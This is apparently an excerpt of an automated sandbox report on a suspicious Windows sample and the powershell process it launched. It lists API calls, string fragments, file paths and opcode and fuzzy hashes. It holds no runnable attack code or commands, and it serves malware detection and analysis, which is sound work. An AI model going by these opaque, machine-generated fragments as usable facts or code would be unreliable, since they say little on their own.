                                      • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                      • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
                                      • lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidelstrlen
                                      • String ID: C:\Windows\Intragantes.geo$sarcoderma
                                      • API String ID: 3109718747-3933101654
                                      • Opcode ID: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                      • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                      • Opcode Fuzzy Hash: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                      • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                      • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                      • Opcode Fuzzy Hash: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                      • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-3081826266
                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                      • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                      • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                      • GetTickCount.KERNEL32 ref: 00402E8E
                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                      • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00405253
                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                        • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                      • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                      APIs
                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                      • GlobalFree.KERNEL32(?), ref: 004038E6
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1100898210-3081826266
                                      • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                      • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                      • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                      • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SDWLLRJcsY.exe,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SDWLLRJcsY.exe,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-224404859
                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                      • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                      • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                      • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k
                                      • API String ID: 0-3810944114
                                      • Opcode ID: 0b5db0a9cb3dc56c380e1753ac1c34095fdf09d7085aba85bd86d7881901f2d9
                                      • Instruction ID: 9ee0f07bd49472cf3fcaa0b7616d3bc4ad57b78b39746e107519013f8fb503a0
                                      • Opcode Fuzzy Hash: 0b5db0a9cb3dc56c380e1753ac1c34095fdf09d7085aba85bd86d7881901f2d9
                                      • Instruction Fuzzy Hash: 43B14B70E002198FDF10CFA9D9A5BAEBBF2AF88314F148539D815A7394EB749845CF91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5bbd227368f669e589739835e79be49e30b79c1f0fd92d93acd372e95d24efe4
                                      • Instruction ID: ea6c587d0f4b4d63a4ff231b0bf93620da0d3ab22325bfe24c33114c91661713
                                      • Opcode Fuzzy Hash: 5bbd227368f669e589739835e79be49e30b79c1f0fd92d93acd372e95d24efe4
                                      • Instruction Fuzzy Hash: 1EB16C71E002098FDB10CFA9D8A1B9EBBF2BF88314F188569D414A77A4EB759C45CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                      • API String ID: 0-2699759020
                                      • Opcode ID: 578e145045c0b9a0b512f13b168376db76e1caab69a2201ec24c40778c922bf1
                                      • Instruction ID: fa24e4ea2da39bbeaf57706cbd5b1902f278e4be8e5fd22b2e8285930857b5c2
                                      • Opcode Fuzzy Hash: 578e145045c0b9a0b512f13b168376db76e1caab69a2201ec24c40778c922bf1
                                      • Instruction Fuzzy Hash: 5582A1B4E00259DFEB20DB58C951B9AB7B2EF85304F10C4AAD50A6BB51CB31ED85CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                      • API String ID: 0-3166488486
                                      • Opcode ID: ff13de33408da8c2681a9daebf5825b5216a044dbcbef9d3466a5c8afc92823d
                                      • Instruction ID: 1d4cdb091b1bb7ac27162ba12d721d3d4b3beb476b449d266b8b1ae852c49753
                                      • Opcode Fuzzy Hash: ff13de33408da8c2681a9daebf5825b5216a044dbcbef9d3466a5c8afc92823d
                                      • Instruction Fuzzy Hash: 9432FAB4B002199FDB249B68C851BEEBBA2EF85300F15C469D5099FB95CF32DC49CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8N$k$Hbq$h]$k$h]$k$h]$k$$^q$$^q$I$k
                                      • API String ID: 0-297966741
                                      • Opcode ID: 8e22cd7b9ab4c15f15404e182ccf431a453258b19f216dde825df1665757f1b0
                                      • Instruction ID: d2257046645f905f6560151a0ec3ca62eacd17848776ff8ca8abdce9be18ef20
                                      • Opcode Fuzzy Hash: 8e22cd7b9ab4c15f15404e182ccf431a453258b19f216dde825df1665757f1b0
                                      • Instruction Fuzzy Hash: 5A223E34B002588FCB65DB25C894AAEB7F2BF89344F1444AAD40AAB351CF35DD86CF81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                      • API String ID: 0-445857065
                                      • Opcode ID: 9f22be7741a91491ef8b1a9c405d7cf6c441ce47ec9039b5964d31a484f707dd
                                      • Instruction ID: 54b81a9c895c3e38fd63c33d189c9c2e782518bf531bd5cb775016b9e3ad7ae9
                                      • Opcode Fuzzy Hash: 9f22be7741a91491ef8b1a9c405d7cf6c441ce47ec9039b5964d31a484f707dd
                                      • Instruction Fuzzy Hash: 4032C4B0B01209DFE724DB58C861F9ABBB2BF85304F148469E5099FB95CB72DC45CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q
                                      • API String ID: 0-1196845430
                                      • Opcode ID: dc31fc6cff613c86cee170ecaa5169999caa880fd275d36af94f6a511a95d296
                                      • Instruction ID: 90654784b8017a1d9a30d57fb4755b04d85ac2d93858e655cc49f4ac027a0cd1
                                      • Opcode Fuzzy Hash: dc31fc6cff613c86cee170ecaa5169999caa880fd275d36af94f6a511a95d296
                                      • Instruction Fuzzy Hash: 55D260B4A40219DFEB24DB64C851BDAB7B2BF85304F1084A9D90DABB51CB31ED85CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k$\V$k
                                      • API String ID: 0-1321503793
                                      • Opcode ID: 0049b383557d1b65ba85a1e0adde7874d910fe31acf688b3c22f4f68be38188d
                                      • Instruction ID: 4e8214cfc2ca6c0482ea12db72c70dd06afb98515cc9ff5efd301b196eed7461
                                      • Opcode Fuzzy Hash: 0049b383557d1b65ba85a1e0adde7874d910fe31acf688b3c22f4f68be38188d
                                      • Instruction Fuzzy Hash: E57157B1E00249CFDB10CFA8C891B9EBBF2AF88314F148169E454A7754EB799846CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \V$k$\V$k
                                      • API String ID: 0-1321503793
                                      • Opcode ID: 37a081288eb913abbad847f4fc517e27eaa7e88f8edb9b79d87e8a814fb04454
                                      • Instruction ID: c0fd38a9fedcf3d3cd95a5b399091926787bf2c5b6684ebaa95356a7022aee1a
                                      • Opcode Fuzzy Hash: 37a081288eb913abbad847f4fc517e27eaa7e88f8edb9b79d87e8a814fb04454
                                      • Instruction Fuzzy Hash: 917167B1E00209CFDF10CFA9C890B9EBBF2AF88314F148169E455A7754EB799842CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tP^q$tP^q
                                      • API String ID: 0-309238000
                                      • Opcode ID: a37e1c431f4cb76ea5ba8862597efe471af63d213e572ce52ccd72ea88d62987
                                      • Instruction ID: e1ec858b59325e0a886543efa3a5bfe5e123663edebfee7ddaee64153637893a
                                      • Opcode Fuzzy Hash: a37e1c431f4cb76ea5ba8862597efe471af63d213e572ce52ccd72ea88d62987
                                      • Instruction Fuzzy Hash: C3514BB17043459FEB398A69D8007ABBBA69FC6311F14C46BD64DCFA91CB31D845C3A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3165533947.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2da0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: h]$k$I$k
                                      • API String ID: 0-1783297608
                                      • Opcode ID: d2812c1dcbc522140b76b6f9c292aaca919145c75336fdfcaf2410acfbd738cf
                                      • Instruction ID: d0063ab485c4e1901036deb1bc1e326bba950c9633c73937803c034a9ce03cf8
                                      • Opcode Fuzzy Hash: d2812c1dcbc522140b76b6f9c292aaca919145c75336fdfcaf2410acfbd738cf
                                      • Instruction Fuzzy Hash: F431EB34A011188FDB25DB64C895AEEB7F2BF89349F1044E9D50AAB351CB359E86CF81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: d669a56279c017b0533c1f51c2e6bf409bc7916555160cfa374fa0789e08575b
                                      • Instruction ID: 46508fce6efe6854af32b81481e0eeaddde7175d7871c8da82e6ecbb9cbbed74
                                      • Opcode Fuzzy Hash: d669a56279c017b0533c1f51c2e6bf409bc7916555160cfa374fa0789e08575b
                                      • Instruction Fuzzy Hash: AC8291B4A00258DFDB30DB54C951B9AB7B2EB89304F10C5A9DA0E6BB41CB31ED85CF95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 377af6c7ad31c58984d5d8c6627c1f1da6e7a74a7f28afe485b15ebc8f3b26bd
                                      • Instruction ID: 7d40d5aadbb94fb5159367253df0bee47929fb5f14a60228baa0c716a48701aa
                                      • Opcode Fuzzy Hash: 377af6c7ad31c58984d5d8c6627c1f1da6e7a74a7f28afe485b15ebc8f3b26bd
                                      • Instruction Fuzzy Hash: F17283B4A01218DFDB24DB54CC51B9AB7B2AF89304F1085A9D90E6FB55CB31ED81CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q
                                      • API String ID: 0-1614139903
                                      • Opcode ID: 3ebea06cfa0a1915055b34d50241c35c8135c36ddbca8ffbfbc66010eb9da8e5
                                      • Instruction ID: e7f0dab0c7c9a5befdfe8c0f3c4be16534c88af0c34d62d29028e8263d8e7fd6
                                      • Opcode Fuzzy Hash: 3ebea06cfa0a1915055b34d50241c35c8135c36ddbca8ffbfbc66010eb9da8e5
                                      • Instruction Fuzzy Hash: D8729FB4A00259DFEB20DB54C951B9AB7B2EF85304F10C49ADA0E6BB51CB31ED85CF91
                                      • API ID:
                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3199432138
                                      • Opcode ID: 43dda3ea7aab5cc322a18a5133f6f8756153b713c9f8de1f6930b0c2b787cf09
                                      • Instruction ID: bc2f306b50e04c3ec8d2c954495245efd02e1cb8ba55e3b6997589c8a6cf2ca5
                                      • Opcode Fuzzy Hash: 43dda3ea7aab5cc322a18a5133f6f8756153b713c9f8de1f6930b0c2b787cf09
                                      • Instruction Fuzzy Hash: 7A617AB17443098FE73C4A3884116FBBBE6AFC5210F24847AD649CBB65DA32C885C7D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                      • API String ID: 0-2098638132
                                      • Opcode ID: 6532bb9c5ba32cffd80743661e4a624135be7183601bf07cd4375c0592922821
                                      • Instruction ID: 76af646bcb60a979a0bd75f1f71d9438db5cdab01f452d2b6ad9c613bac99b61
                                      • Opcode Fuzzy Hash: 6532bb9c5ba32cffd80743661e4a624135be7183601bf07cd4375c0592922821
                                      • Instruction Fuzzy Hash: E241E5F5A80206DFEB38CF5CC840BE6B7A2AF45644F588559EA499FE91C731DC40CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3272787073
                                      • Opcode ID: 62cfaa0a05d4b5b1d89d61da545dcd7000804f278d07337a57d5d8dd4517e66c
                                      • Instruction ID: 36d9654644f3494de11b44706fbdc04071955bc81c641f6db1e7772167483248
                                      • Opcode Fuzzy Hash: 62cfaa0a05d4b5b1d89d61da545dcd7000804f278d07337a57d5d8dd4517e66c
                                      • Instruction Fuzzy Hash: 054138F0B0830A9FEB395A3488506FF7BA1AF86210F10446BD609CBE91DB31C945CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3272787073
                                      • Opcode ID: 717f6d13897d209186864fc3594d1dc3fda7c8f09e0c205fa080e9f8f5676a66
                                      • Instruction ID: 87b5107d223a5cc8375ee963511068aca6afaf41652cc799580521fea90e4689
                                      • Opcode Fuzzy Hash: 717f6d13897d209186864fc3594d1dc3fda7c8f09e0c205fa080e9f8f5676a66
                                      • Instruction Fuzzy Hash: D14138F1B1022ACFEB394E2984542F7B7D5BBC5210F24866BDA1C8FE55CA31C545C751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                      • API String ID: 0-3272787073
                                      • Opcode ID: 2e2f5763f46b5a46537fda68df9d895f569a837bdc6413153d0d0608e490d213
                                      • Instruction ID: 563ffe8ddf2536510717f2ed0ca59d5ae20908691e136db07727dd26a4a10cf1
                                      • Opcode Fuzzy Hash: 2e2f5763f46b5a46537fda68df9d895f569a837bdc6413153d0d0608e490d213
                                      • Instruction Fuzzy Hash: A43146F2B4420B8FFB344A6998006F6B7E9AFC5211F24447BC60D8BA65CA36C485C762
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                      • API String ID: 0-3997570045
                                      • Opcode ID: afdb60f4033a1e66b0d9f136d35f43cf7ac49da9823776026cb320a1b3c80ddb
                                      • Instruction ID: 95ffabf60710135896b4b3195c57b01afac195b22be8776c8b91a10c10ac11f5
                                      • Opcode Fuzzy Hash: afdb60f4033a1e66b0d9f136d35f43cf7ac49da9823776026cb320a1b3c80ddb
                                      • Instruction Fuzzy Hash: 4B41BFF1A00206AFFB34CE14C544BE5B7A6EBC5720F09846BD6195BA90CB31D984CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                      • API String ID: 0-3846404929
                                      • Opcode ID: bb562e2d8f0fbdcb50c0c75147c4fd2b476cc8471ccc612da41ec03243a9ca26
                                      • Instruction ID: 044919eb16aaed8770f87795c403be464df8420ee597d1242b1bace87600dffa
                                      • Opcode Fuzzy Hash: bb562e2d8f0fbdcb50c0c75147c4fd2b476cc8471ccc612da41ec03243a9ca26
                                      • Instruction Fuzzy Hash: C831B1B5B40115DFDB28CF98C444AEABBA2BF88710F288559EA09ABB51C731DC41CBD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3173498848.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_73b0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o^q$(o^q$(o^q$(o^q
                                      • API String ID: 0-1978863864
                                      • Opcode ID: ec01d6e079ce85f28cf112c322313beb68fbf5e6446ad80295b676c2ddc82662
                                      • Instruction ID: 924f372e300ff742edfb305fd07661d41d2fdbc906eb2fa8219c797dcb0a504e
